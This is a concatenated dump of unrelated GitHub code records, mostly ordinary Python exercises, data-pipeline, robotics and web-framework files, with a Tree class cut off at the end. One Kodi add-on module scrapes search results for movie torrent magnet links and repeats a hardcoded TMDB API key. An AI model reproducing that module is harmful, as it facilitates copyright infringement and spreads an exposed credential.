1\n\n key = base * 10000 + index\n if key in inf:\n return inf[key]\n\n w = 0\n ad = [x for x in nums if base < x <= (base + 3)]\n for a in ad:\n if a in nums:\n w = w + dist_ways_ways(nums, a, index + 1, inf)\n\n inf[key] = w\n return w\n\n\ndef part2(nums):\n inf = {}\n return dist_ways_ways(nums, 0, 0, inf)\n\n\nif __name__ == '__main__':\n with open('10.txt') as _file:\n lines = [int(line) for line in _file.read().splitlines()]\n nums = [int(x) for x in lines]\n\n print(\"Part 1 answer: \", part1(nums))\n print(\"Part 2 answer: \", part2(nums))\n","repo_name":"Cipulot/AdventOfCode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6158059679","text":"# Programa com função ficha() que recebe dois parâmetros opcionais: nome do jogador e quantos gols ele marcou\n# Programa deve mostrar a ficha do jogador, mesmo que algum dado não tenha sido informado corretamente\ndef ficha(jogador='', gols=0):\n print(f'O jogador {jogador} fez {gols} gols(s).')\n\n\nnome = str(input('Digite o nome do jogador: '))\ngols = str(input(f'Quantos gols {nome} fez?'))\nif gols.isnumeric():\n gols = int(gols)\nelse:\n g = 0\nif nome.strip() == '':\n ficha(gols=gols)\nelse:\n ficha(nome, gols)","repo_name":"gabcarvalhaes/curso-em-video","sub_path":"python-mundo-3/exercicios/ex103.py","file_name":"ex103.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73577172969","text":"from pyspark.sql import SparkSession, Window\nfrom pyspark import find_spark_home, HiveContext\nfrom pyspark.sql.functions import year, col, lit, row_number, desc, dense_rank, to_timestamp\n\nfrom SparkSessionBase import SparkSessionBase\n\nclass RecommendByRecentReview(SparkSessionBase):\n SPARK_URL = \"local\"\n SPARK_APP_NAME = 'TextRandJob'\n ENABLE_HIVE_SUPPORT = True\n\n def __init__(self):\n self.spark = self._create_spark_session()\n\n def start(self):\n hc=HiveContext(self.spark.sparkContext)\n re_df=hc.table('review').limit(50000)\n w1=Window.partitionBy('rev_user_id').orderBy(col('rev_date').desc())\n result=re_df.select('rev_user_id','review_id','rev_business_id','rev_date',dense_rank().over(w1))\n result.show()\n# XXX 大数据分析代码\n\nif __name__ == '__main__':\n RecommendByRecentReview().start()","repo_name":"KYJ2021/bigdata","sub_path":"RecommendByRecentReview.py","file_name":"RecommendByRecentReview.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36843930595","text":"from time import sleep\n\n\ndef change_direction(current_direction):\n if current_direction == 0:\n return 3\n else:\n return current_direction - 1\n\n\ndef back_direction(current_direction):\n if current_direction == 0:\n return 2\n elif current_direction == 1:\n return 3\n else:\n return current_direction - 2\n\n\ndef set_next(a, b, direction):\n if direction == 3:\n a = a + dy[1]\n b = b + dx[1]\n elif direction == 2:\n a = a + dy[2]\n b = b + dx[2]\n elif direction == 1:\n a = a + dy[0]\n b = b + dx[0]\n else:\n a = a + dy[3]\n b = b + dx[3]\n\n return a, b\n\n\n# 동 서 남 북\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ncount = 0\nnext_a = 0\nnext_b = 0\n\nn, m = map(int, input().split())\na, b, direction = map(int, input().split())\n\nboard = []\nis_visited = [[0] * m for _ in range(n)] # 0 :아직 안들림 1 : 들림\n\n\nfor i in range(n):\n board.append(list(map(int, input().split())))\n\nis_visited[b][a] = 1\ncount = count + 1\n\nwhile True:\n is_move = False\n for i in range(4):\n direction = change_direction(direction)\n next_a, next_b = set_next(a, b, direction)\n # 바다 거나, 들렸던 칸이면\n if board[next_b][next_a] == 1 or is_visited[next_b][next_a] == 1:\n print(\"바다거나, 들렸던 칸임: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n continue\n else:\n print(\"방문: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n count = count + 1\n a = next_a\n b = next_b\n is_visited[next_b][next_a] = 1\n is_move = True\n break\n next_a, next_b = set_next(a, b, back_direction(direction))\n if board[next_b][next_a] == 1:\n break\n elif is_move == False:\n a = next_a\n b = next_b\n print(\"뒤로가기: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n\n\nprint(count)\n# 1. 방향 바꾸기\n","repo_name":"2yunseong/Algorithm","sub_path":"ndb/implementation/example4_4.py","file_name":"example4_4.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24231887165","text":"\"\"\"\n有一分数序列:2/1,3/2,5/3,8/5,13/8,21/13...求出这个数列的前20项之和。\n思路:\n引入reduce 进行相加\n规律 前一个的分子是第二个的分母 前一个分子分母相加等于第二个分子\n\"\"\"\nfrom functools import reduce\nl=[]\nm=2\nn=1\nl.append(m/n)\nfor i in range(1,20):\n n,m=m,m+n\n l.append(m/n)\n\nsum = reduce(lambda x,y:x+y,l)\nprint(sum)","repo_name":"liucheng2912/py","sub_path":"100例/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6676979504","text":"from airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom utils import strategy\nfrom datetime import timedelta\nimport os\n\nDAG_ID = os.path.basename(__file__).replace('.pyc', '').replace('.py', '')\nCONN_ID = 'postgres_stocks'\n\nSMA = 30\nDEV = 2\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_failure': False,\n 'email_on_retry': False,\n}\n\nwith DAG(\n dag_id=DAG_ID,\n default_args=default_args,\n schedule_interval='10 1 * * *',\n) as dag:\n\n bollinger_bands_aapl = PythonOperator(\n task_id='bollinger_bands_aapl',\n python_callable=strategy.apply_strategy,\n op_kwargs={\n 'connector': CONN_ID,\n 'source_table_name': 'aapl',\n 'ticker': 'AAPL',\n 'strategy_func': strategy.bollinger_bands_strategy,\n 'op_kwargs': {\n 'sma': SMA,\n 'dev': DEV,\n }\n }\n )\n\n","repo_name":"airflow-courses/udemy_algo_trading_airflow","sub_path":"airflow/dags/strategy/bollinger_bands_strategy.py","file_name":"bollinger_bands_strategy.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"20509276815","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.github.com/stonier/py_trees_ros/license/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nThis node captures the rtreachabiliy decision result over safety\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport py_trees\nimport rospy\nimport sensor_msgs.msg as sensor_msgs\nfrom std_msgs.msg import Float32\nfrom py_trees_ros import subscribers\n############<>##############################\nimport numpy as np\nimport math\nfrom collections import deque\n############<>################################\n\n##############################################################################\n# Blackboard node\n##############################################################################\n\n\nclass ToBlackboard(subscribers.ToBlackboard):\n \"\"\"\n Subscribes to the battery message and writes battery data to the blackboard.\n Also adds a warning flag to the blackboard if the battery\n is low - note that it does some buffering against ping-pong problems so the warning\n doesn't trigger on/off rapidly when close to the threshold.\n\n When ticking, updates with :attr:`~py_trees.common.Status.RUNNING` if it got no data,\n :attr:`~py_trees.common.Status.SUCCESS` otherwise.\n\n Blackboard Variables:\n * rtreach_result: the raw message from topic /reachability_result\n * emergency_stop_warning (:obj:`bool`)\n * rtreach_warning (:obj:`bool`)\n * rtreach_long_term_warning (:obj:`bool`)\n Args:\n name (:obj:`str`): name of the behaviour\n topic_name (:obj:`str`) : name of the input topic \n enable_emergency_stop (:obj:`float`) : parameter \n rtreach_window_size (:obj:`float`) : parameter \n rtreach_window_threshold (:obj:`float`) : parameter \n \"\"\"\n def __init__(self, \n name, \n topic_name=\"rtreach_result\", \n enable_emergency_stop=True, \n rtreach_window_size=25, \n rtreach_window_threshold=0.75 \n ):\n \n super(ToBlackboard, self).__init__(name=name,\n topic_name=topic_name,\n topic_type=Float32,\n blackboard_variables={\"rtreach_result\":None},\n clearing_policy=py_trees.common.ClearingPolicy.NEVER\n )\n self.blackboard = py_trees.blackboard.Blackboard()\n \n self.blackboard.rtreach_result = Float32()\n \n self.blackboard.emergency_stop_warning = False\n self.blackboard.rtreach_warning = False\n self.blackboard.rtreach_long_term_warning = False\n \n self.enable_emergency_stop=enable_emergency_stop \n self.rtreach_window_size=rtreach_window_size \n self.rtreach_window_threshold=rtreach_window_threshold \n############<>##############################\n self.rtreach_window = deque(maxlen=rtreach_window_size)\n self.rtreach_long_term_pub = rospy.Publisher( '/uuv0/rtreach_long_term',\n Float32,\n queue_size=1) \n############<>################################\n def update(self):\n \"\"\"\n Call the parent to write the raw data to the blackboard and then check against the\n parameters to update the bb variable\n \"\"\"\n self.logger.debug(\"%s.update()\" % self.__class__.__name__)\n status = super(ToBlackboard, self).update()\n if status == py_trees.common.Status.RUNNING:\n return status\n############<>##############################\n # Old way, using binary rtreach output\n # if self.blackboard.rtreach_result.data < 1.0 and self.enable_emergency_stop:\n # self.blackboard.emergency_stop_warning = True\n # rospy.logwarn_throttle(1, \"%s: emergency_stop_warning!\" % self.name)\n \n # long term rtreach\n if rospy.Time.now() > rospy.Time(5): \n val = (max(\n max(\n min(math.exp(self.blackboard.rtreach_index.data) / 4.0, 0.5)\n ,0),\n self.blackboard.rtreach_result.data)\n )\n self.rtreach_window.append(val)\n # 1: safe, 0: unsafe\n if (np.mean(self.rtreach_window) < self.rtreach_window_threshold) and len(self.rtreach_window) == self.rtreach_window_size:\n self.blackboard.rtreach_long_term_warning = True\n rospy.logwarn(\"%s: **** rtreach_long_term_warning (%0.2f)\" % (self.name, val))\n else:\n self.blackboard.rtreach_long_term_warning = False\n\n if self.blackboard.rtreach_result.data < 1.0:\n self.blackboard.rtreach_warning = True\n rospy.logwarn(\"%s: rtreach_warning\" % self.name)\n else:\n self.blackboard.rtreach_warning = False\n self.rtreach_long_term_pub.publish(Float32(np.mean(self.rtreach_window)))\n\n\n############<>################################\n return status\n \n############<>##############################\n############<>################################","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/behaviour_tree_gen/bb_rtreach2bb.py","file_name":"bb_rtreach2bb.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32239549105","text":"#\n# Rank: MEDIUM\n# Score: 25/25\n# HackerRank Link: https://www.hackerrank.com/challenges/the-time-in-words/problem\n#\n\n# (5, 00, \"five o' clock\"), /\n# (5, 01, \"one minute past five\"),\n# (5, 10, \"ten minutes past five\"),\n# (5, 15, \"quarter past five\"),\n# (5, 28, \"twenty eight minutes past five\"),\n# (5, 30, \"half past five\"),\n# (5, 40, \"twenty minutes to six\"),\n# (5, 45, \"quarter to six\"),\n# (5, 47, \"thirteen minutes to six\")\n\n\nimport math\n\n\ndef the_time_in_words(h, m):\n if m == 0:\n return '{:s}{:s}'.format(number_mapping(h), time_mapping(0))\n\n if m <= 30: # past\n conj = 1\n hour = h\n else: # to\n conj = 2\n hour = (h+1) % 12\n m = 60 - m\n\n minute = number_mapping(m)\n if not minute:\n tens = tens_mapping(int(math.floor(m / 10)))\n units = number_mapping(m % 10)\n\n if not tens:\n minute = units + 'teen'\n elif not units:\n minute = tens\n else:\n minute = '{:s} {:s}'.format(tens, units)\n\n minute = minute_mapping(minute, m)\n\n return '{:s}{:s}{:s}'.format(minute,\n time_mapping(conj),\n number_mapping(hour))\n\n\ndef tens_mapping(t):\n return{\n 2: 'twenty'\n }.get(t, None)\n\n\ndef number_mapping(n):\n return{\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 15: 'quarter',\n 30: 'half'\n }.get(n, '')\n\n\ndef time_mapping(t):\n return{\n 0: ' o\\' clock',\n 1: ' past ',\n 2: ' to '\n }.get(t, '')\n\n\ndef minute_mapping(minute, m):\n if m == 15 or m == 30:\n return minute\n return{\n True: '{:s} minutes'.format(minute),\n False: '{:s} minute'.format(minute)\n }.get(m > 1, None)\n","repo_name":"meanthadar-p/python-practice","sub_path":"Medium/TheTimeInWords/TheTimeInWords.py","file_name":"TheTimeInWords.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70544129770","text":"def print_lines (filename):\n with open (filename) as file:\n for line in file:\n print (line.strip())\n\ndef word_search (filename):\n word = input (\"Enter a word: \")\n word_lower = word.lower()\n with open (filename) as file:\n for line in file:\n line = line.strip ()\n line_lower = line.lower ()\n if word_lower == line_lower:\n print (\"Word was found!\")\n file.close ()\n return\n \n print (\"Word was not found!\")\n file.close ()\n\ndef longest_word (a_string):\n tokens = a_string.split()\n longest = \"\"\n for word in tokens:\n if len(word) > len(longest):\n longest = word\n print (longest)\n return longest\n\ndef longest_words (filename):\n longest = \"\"\n with open (filename) as file:\n for line in file:\n stripped = line.strip()\n if stripped != \"\":\n word = longest_word (line)\n if len(word) > len (longest):\n print (word)\n\ndef prompt_and_write ():\n filename = input (\"Enter a filename: \")\n with open (filename, \"w\") as file:\n while True:\n line = input (\">> \")\n if line == \"\":\n break\n else:\n file.write (line)\n file.write (\"\\n\")\n\ndef main ():\n # print_lines (\"data/alice.txt\")\n # word_search (\"data/words.txt\")\n # longest_word (\"The quick brown fox jumped over the lazy dog.\")\n # longest_words (\"data/alice.txt\")\n prompt_and_write ()\n \nif __name__ == \"__main__\":\n main ()\n","repo_name":"alextedesco/GCIS-120","sub_path":"Unit03/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19770966015","text":"# flask_restful_dbbase/generator.py\n\"\"\"\nThis module implements a technique for creating resources with specific\nmethods.\n\nA customized resource can be created from a resource, but with some\nof the default HTTP methods removed, but with customized resource\nmodifications applied to make a unique resource.\n\"\"\"\nfrom flask_restful_dbbase.resources import DBBaseResource\n\n\ndef create_resource(\n name,\n resource_class,\n model_class=None,\n methods=None,\n url_prefix=None,\n url_name=None,\n class_vars=None,\n):\n \"\"\"\n This function creates a resource based on a source model class\n and a seed resource.\n\n Args:\n name: (str) : This will be the name stored with the new\n class.\n\n resource_class: (obj) : This is the ModelResource class that\n will be used as the basis of the new class.\n\n methods: (list) : This the list of HTTP methods that should\n be transferred to the new class.\n\n url_prefix: (str) : This is url_prefix that can be used in place of\n the default url_prefix that comes with the resource class.\n\n url_name: (str) : This the url_name that can be used in place\n of the default url_name that comes with the resource.\n\n class_vars: (dict) : This is a dictionary of variables and\n values that will be transferred to the new resource. These\n are set in place last, so it is here that additional\n customization of the new resource can be made.\n\n Returns:\n (obj) : The new resource class\n \"\"\"\n params = {}\n if model_class is not None:\n params[\"model_class\"] = model_class\n if url_prefix is not None:\n params[\"url_prefix\"] = url_prefix\n if url_prefix is not None:\n params[\"url_name\"] = url_name\n\n # accumulate changes from subclassing\n # follow subclassing order\n class_dict = {}\n idx = resource_class.mro().index(DBBaseResource)\n for i in range(idx - 1, -1, -1):\n cls = resource_class.mro()[i]\n class_dict.update(cls.__dict__)\n if methods is not None:\n # create stop list\n stop_method_list = [\"get\", \"post\", \"put\", \"patch\", \"delete\"]\n for method in methods:\n if method in stop_method_list:\n stop_method_list.remove(method)\n\n for method in stop_method_list:\n del class_dict[method]\n del class_dict[f\"process_{method}_input\"]\n class_dict[\"methods\"] = set([method.upper() for method in methods])\n\n class_dict.update(params)\n\n if class_vars is not None:\n class_dict.update(class_vars)\n\n new_class = type(\n name,\n (DBBaseResource,),\n class_dict,\n )\n\n # required model check\n if new_class.model_class is None:\n raise ValueError(\"A model class must be defined\")\n\n return new_class\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"flask_restful_dbbase/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1350131215","text":"\"\"\"The :mod:`pyts.multivariate.utils` module includes utility tools.\"\"\"\n\nfrom sklearn.utils import check_array\n\n\ndef check_3d_array(X):\n \"\"\"Check that the input is a three-dimensional arrayself.\n\n Parameters\n ----------\n X : array-like\n Input data\n\n \"\"\"\n X = check_array(X, ensure_2d=False, allow_nd=True)\n if X.ndim != 3:\n raise ValueError(\"X must be 3-dimensional (got {0}).\".format(X.ndim))\n return X\n","repo_name":"martanto/pyts","sub_path":"pyts/multivariate/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"72634647848","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\nimport sys, xbmcplugin, xbmcgui, xbmcaddon, os, json, hashlib, re, unicodedata, math, xbmcvfs\r\nimport shutil\r\nfrom urllib.parse import urlparse, quote_plus, unquote, urlencode\r\nfrom urllib.request import urlopen, Request\r\nimport urllib.request, urllib.parse, urllib.error\r\nimport urllib.parse\r\n\r\nfrom metadatautils import MetadataUtils\r\nmg = MetadataUtils()\r\nmg.tmdb.api_key = 'bd6af17904b638d482df1a924f1eabb4'\r\n\r\nAddonID = 'plugin.video.CubeTor'\r\nAddon = xbmcaddon.Addon(AddonID)\r\nAddonName = Addon.getAddonInfo(\"name\")\r\naddonDir = Addon.getAddonInfo('path')\r\nicon = os.path.join(addonDir,\"icon.png\")\r\niconsDir = os.path.join(addonDir, \"resources\", \"images\")\r\n\r\nMUlang = \"pt-BR\" if Addon.getSetting(\"MUlang\") == \"1\" else \"en\"\r\nMUlangM = \"pt-BR\" if Addon.getSetting(\"MUlangM\") == \"1\" else \"en\"\r\nMUcache = True if Addon.getSetting(\"MUcache\") == \"true\" else False\r\nMUcacheEpi = True if Addon.getSetting(\"MUcacheEpi\") == \"true\" else False\r\nMUfanArt = True if Addon.getSetting(\"MUfanArt\") == \"true\" else False\r\n\r\nlibDir = os.path.join(addonDir, 'resources', 'lib')\r\nsys.path.insert(0, libDir)\r\nimport xx, common\r\n\r\naddon_data_dir = xbmcvfs.translatePath(Addon.getAddonInfo(\"profile\"))\r\ncacheDir = os.path.join(addon_data_dir, \"cache\")\r\n#-----------------------------------------\r\nparams = urllib.parse.parse_qs(sys.argv[2][1:])\r\nname = params.get('name',[None])[0]\r\nurl = params.get('url',[None])[0]\r\nmode = params.get('mode',[None])[0]\r\niconimage = params.get('iconimage',[None])[0]\r\nlogos = params.get('logos',[None])[0]\r\ninfo = params.get('info',[None])[0]\r\ndados = params.get('dados',[{}])[0]\r\n#-----------------------------------------\r\ndef PeerSeed(url2):\r\n\timport html\r\n\ttry:\r\n\t\tlink = quote_plus(html.unescape(url2))\r\n\t\tseeds = common.OpenURL(\"https://checker.openwebtorrent.com/check?magnet=\"+link, ssl=True)\r\n\t\tj = json.loads(seeds)\r\n\texcept:\r\n\t\tj = {\"error\": \"nao carregou\"}\r\n\treturn j\r\n#-----------------------------------------\r\ndef BuscaTvShowsPre():\r\n\tq = xbmcgui.Dialog().input(\"O que busca? (Séries)\")\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaTvShows&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\ndef BuscaTvShows():\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/tv?api_key=bd6af17904b638d482df1a924f1eabb4&language=en&query=\"+quote_plus(url))\r\n\tentries=json.loads(link)\r\n\t#ST(entries)\r\n\t#mmm = mg.get_tvshow_details(title=\"\",tmdb_id=url, ignore_cache=MUcache, lang=MUlang)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\tprogress.close()\r\n\tfor entry in entries['results']:\r\n\t\t#ST(entry)\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmmm = mg.get_tvshow_details(title=\"\",tmdb_id=str(entry[\"id\"]), ignore_cache=MUcache, lang=MUlang)\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(mmm[-1][\"TVShowTitle\"], mmm[-1][\"tmdb_id\"], \"trakt.Shows\", isFolder=True, dados={'meta': mmm[-1]})\r\n\t\texcept:\r\n\t\t\tpass\r\n#-----------------------------------------\r\ndef BuscaFilmesPre():\r\n\tq = xbmcgui.Dialog().input(\"Se quiser colocar o ano faça dessa forma: Titanic, 1997\")\r\n\t#q = \"Mortal Kombat, 2021\"\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaFilmes&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t#q = \"Mortal Kombat\"\r\ndef BuscaFilmes():\r\n\tyearre = re.compile(\", (\\d{4})$\").findall(url)\r\n\tquery = quote_plus(re.sub(', (\\d{4})$', '', url))\r\n\tif yearre:\r\n\t\tyear=\"&year=\"+yearre[0]\r\n\telse:\r\n\t\tyear=\"\"\r\n\tST(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tentries=json.loads(link)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\ttrak = xx.traktM()\r\n\tfor entry in entries['results']:\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmm = mg.get_tmdb_details(tmdb_id=str(entry['id']), imdb_id=\"\", tvdb_id=\"\", title=\"\", year=\"\", media_type=\"movies\", preftype=\"\", manual_select=False, ignore_cache=False, lang=MUlangM)\r\n\t\t\tpc = 1 if str(mm[\"tmdb_id\"]) in trak else None\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(\"\", str(entry['id']), \"tmdb.Opcoes\", isFolder=False, IsPlayable=True, dados={'mmeta': mm, 'pc': pc})\r\n\t\texcept:\r\n\t\t\tpass\r\n\tprogress.close()\r\n\txx.AddDir(url+\" Dublado 1080p\", quote_plus(url+\" Dublado 1080p\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" x265\", quote_plus(url+\" x265\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" YTS\", quote_plus(url+\" YTS\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url, quote_plus(url), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n#-----------------------------------------\r\ndef BuscaCat():\r\n\ttry:\r\n\t\tgoogle = xx.OpenURL(\"https://www.google.com/search?q=\"+url+\"+torrent\")\r\n\t\tgooglere = re.compile(\";url=([^\\\"]+)\\&ved\\=\").findall(google)\r\n\t\tprogress = xbmcgui.DialogProgress()\r\n\t\tprogress.create('Carregando...')\r\n\t\tprogress.update(0, \"Carregando...\")\r\n\t\tprog = 1\r\n\t\t#ST(googlere)\r\n\t\tfor links in googlere[:5]:\r\n\t\t\tif (progress.iscanceled()): break\r\n\t\t\tmagnet = xx.OpenURL(links)\r\n\t\t\tmagnetre = re.compile('magnet\\:\\?[^\\'|\"]+').findall(magnet)\r\n\t\t\tfor link in magnetre:\r\n\t\t\t\ttitle = re.compile(\"dn=(.+?)(\\&|$)\").findall(link)\r\n\t\t\t\tif title:\r\n\t\t\t\t\tj = PeerSeed(link)\r\n\t\t\t\t\tif \"seeds\" in j:\r\n\t\t\t\t\t\txx.AddDir(str(j[\"seeds\"])+\" / \"+str(j[\"peers\"])+\" \"+unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\txx.AddDir(unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\tprogtotal = int(100*prog/5)\r\n\t\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\t\tprog+=1\r\n\t\tprogress.close()\r\n\texcept:\r\n\t\txx.AddDir(\"Erro no servidor\", \"\", \"\", iconimage, info=\"\", isFolder=False, IsPlayable=True)\r\n#----------------------------------------\r\ndef ST(x=\"\", o=\"w\"):\r\n\tif o == \"1\":\r\n\t\to = \"a+\"\r\n\tif type(x) == type({}) or type(x) == type([]):\r\n\t\ty = json.dumps(x, indent=4, ensure_ascii=True)\r\n\telse:\r\n\t\ty = str(str(x).encode(\"utf-8\"))\r\n\tPath = xbmc.translatePath( xbmcaddon.Addon().getAddonInfo('path') )\r\n\tpy = os.path.join( Path, \"study.txt\")\r\n\t#file = open(py, \"a+\")\r\n\tfile = open(py, o)\r\n\tfile.write(y+\"\\n\"+str(type(x)))\r\n\tfile.close()","repo_name":"D4anielCB/plugin.video.CubeTor","sub_path":"resources/lib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70093216807","text":"\"\"\"!\nPath in a given graph\n\"\"\"\n\nimport math\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\nfrom uuid import uuid4\n\nfrom pygmodels.gmodel.path import Path\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\nfrom pygmodels.gtype.abstractobj import AbstractTree\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.gtype.queue import PriorityQueue\n\n\nclass Tree(BaseGraph, AbstractTree):\n \"\"\"!\n Ordered Tree object\n \"\"\"\n\n def __init__(self, gid: str, data={}, edges: Set[Edge] = None):\n \"\"\"\"\"\"\n nodes = None\n if edges is not None:\n nodes = set()\n for e in edges:\n estart = e.start()\n eend = e.end()\n nodes.add(estart)\n nodes.add(eend)\n super().__init__(gid=gid, data=data, nodes=nodes, edges=edges)\n self.__root = None\n es = [e.type() for e in self.E]\n if es[0] == EdgeType.DIRECTED:\n\n def egen(x):\n return BaseGraphOps.outgoing_edges_of(self, x)\n\n else:\n\n def egen(x):\n return BaseGraphOps.edges_of(self, x)\n\n self.paths: Dict[\n str, Union[dict, set]\n ] = BaseGraphSearcher.breadth_first_search(\n self, n1=self.root, edge_generator=egen\n )\n self.topsort = self.paths.top_sort\n self.bfs_tree = self.paths.tree[self.root.id()]\n\n @classmethod\n def from_node_tuples(cls, ntpls: Set[Tuple[Node, Node, EdgeType]]):\n \"\"\"\"\"\"\n edges: Set[Edge] = set()\n\n for e in ntpls:\n child = e[0]\n parent = e[1]\n edge = Edge(\n edge_id=str(uuid4()),\n start_node=parent,\n end_node=child,\n edge_type=e[2],\n )\n edges.add(edge)\n return Tree(gid=str(uuid4()), edges=edges)\n\n @classmethod\n def from_edgeset(cls, eset: Set[Edge]):\n \"\"\"\"\"\"\n return Tree(gid=str(uuid4()), edges=eset)\n\n def node_table(self):\n \"\"\"\"\"\"\n node_table = {\n v.id(): {\"child\": False, \"parent\": False} for v in self.V\n }\n for e in self.E:\n estart_id = e.start().id()\n eend_id = e.end().id()\n node_table[estart_id][\"parent\"] = True\n node_table[eend_id][\"child\"] = True\n #\n return node_table\n\n def get_root(self):\n \"\"\"\"\"\"\n node_table = self.node_table()\n root_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is False and v[\"parent\"] is True\n ]\n V = {v.id(): v for v in self.V}\n return V[root_ids[0]]\n\n def leaves(self) -> Set[Node]:\n \"\"\"\"\"\"\n node_table = self.node_table()\n #\n leave_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is True and v[\"parent\"] is False\n ]\n return set([v for v in self.V if v.id() in leave_ids])\n\n @property\n def root(self) 